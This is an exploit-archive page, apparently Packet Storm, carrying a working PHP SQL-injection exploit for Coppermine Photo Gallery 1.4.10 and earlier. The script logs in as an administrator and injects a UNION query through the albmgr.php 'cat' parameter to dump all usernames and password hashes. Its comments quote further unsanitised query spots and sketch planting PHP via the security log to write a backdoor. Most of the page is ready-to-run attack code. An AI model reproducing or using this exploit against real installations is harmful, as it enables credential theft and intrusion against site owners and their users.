exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

coppermine-php.txt

coppermine-php.txt
Posted Jan 7, 2007
Authored by DarkFig

Coppermine Photo Gallery versions 1.4.10 and below remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 65b174348d0e69181017fad62d2dd2609111f2c11a1049d1c610d15a085015d9

coppermine-php.txt

Change Mirror Download
#!/usr/bin/php
<?php

/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");


if($argc < 4)
{
print "\n---------------------------------------------------------";
print "\nAffected.scr..: Coppermine Photo Gallery <= 1.4.10";
print "\nPoc.ID........: 19070104";
print "\nType..........: SQL Injection";
print "\nRisk.level....: Medium";
print "\nSrc.download..: coppermine-gallery.net";
print "\nPoc.link......: acid-root.new.fr/poc/19070104.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url> <adminuser> <adminpass>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://c.com/ admin passwd";
print "\n---------------------------------------------------------\n";
exit(1);
}


/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2] => root [3] => toor
[4] => localhost:8200 [5] => user:passwd
/*/
$url=$argv[1];$adu=$argv[2];
$adp=$argv[3];$pxs=$argv[4];
$pxa=$argv[5];

$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);

print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";

if(!empty($pxs)){
print "\nstatus> Using a proxy $pxs";
$xpl->proxy($pxs);
}

if(!empty($pxa)){
print "\nstatus> Basic proxy authentification $pxa";
$xpl->proxyauth($pxa);
}


/*/
Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url.'include/index.html');
if(preg_match("#Coppermine version: ([0-9]*\.[0-9]*\.[0-9]*)#",$xpl->getcontent(),$matches)) print "\nsploit> Coppermine version ".$matches[1];
else print "\nsploit> Not found";
$table = !empty($matches[1]) ? 'cpg'.str_replace('.','',$matches[1]).'_users' : 'cpg1410_users';


/*/
If you have the admin cookie (but not the password),
replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
print "\nstatus> Trying to get logged in";
$xpl->post($url."login.php?referer=index.php","username=$adu&password=$adp&remember_me=1&submitted=Se+Connecter");
if(!preg_match("#color:red#",$xpl->getcontent())) print "\nsploit> Done";
else die("\nstatus> Exploit failed\n");


/*/
(usermgr.php)
=============
case 'group_alb_access' :
if (isset($_GET['gid'])) $group_id = $_GET['gid'];
$sql = "SELECT group_name FROM [...] WHERE group_id = $group_id [...]";
$result = cpg_db_query($sql);

(db_ecard.php)
==============
$start = isset($_REQUEST['start']) ? $_REQUEST['start'] : ''; [...]
if (!$start) {$startFrom = '0';}else{$startFrom=$start;} [...]
$result = cpg_db_query("SELECT [...] ORDER BY $sortBy $sortDirection LIMIT $startFrom,$countTo");

(albmgr.php)
============
$cat = isset($_GET['cat']) ? ($_GET['cat']) : 0;
if ($cat == 1) $cat = 0;
if (GALLERY_ADMIN_MODE) {
$result = cpg_db_query("SELECT [...] WHERE category = $cat ORDER BY pos ASC");

(filename_to_title())
=====================
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : ''; [...]
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");

(del_titles())
==============
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : '';
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");
/*/
print "\nstatus> Retrieving all members password";
$xpl->get($url."albmgr.php?cat=-1/**/union/**/select/**/user_name,user_password/**/from/**/$table/*");
if(preg_match_all("#<option value=\"album_no=(.*),album_nm='([a-z0-9]{32})'#",$xpl->getcontent(),$matches)) print "\nsploit> Done";
else die("\nstatus> Exploit failed\n");

print "\nsploit> +----------------------------------+----------+";
print "\nsploit> | PASSWORD | USER |";
print "\nsploit> +----------------------------------+----------+";


/*/
(init.inc.php)
==============
$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => ''');
[...]
if (is_array($_POST)) { // and GET, SERVER, REQUEST...
foreach ($_POST as $key => $value) {
if (!is_array($value))
$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
if (!in_array($key, $keysToSkip) && isset($$key)) unset($$key);
}

... that's why we use the html_entity_decode() function.
I just wanted < for a remote php code execution sploit without admin rights :'(.
When the admin view the security logs, it include "security.log.php"...

(security.log.php)
==================
[...]
if (!defined('IN_COPPERMINE')) die(); ?>

Denied privileged access to viewlog.php from user Guest at on January 4, 2007, 2:10 pm
Failed login attempt with Username: <?php mail(you); [...] fwrite(backdoor.php); [...] /* from IP 127.0.0.1 on Jan 04, 2007 at 01:16 PM
/*/
for($i=0;$i<count($matches[0]);$i++)
{
print "\nsploit> | ".$matches[2][$i].' | '.html_entity_decode($matches[1][$i]);
if($i==(count($matches[0])-1)){
print "\nsploit> +----------------------------------+----------+\n";
}
}


?>
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close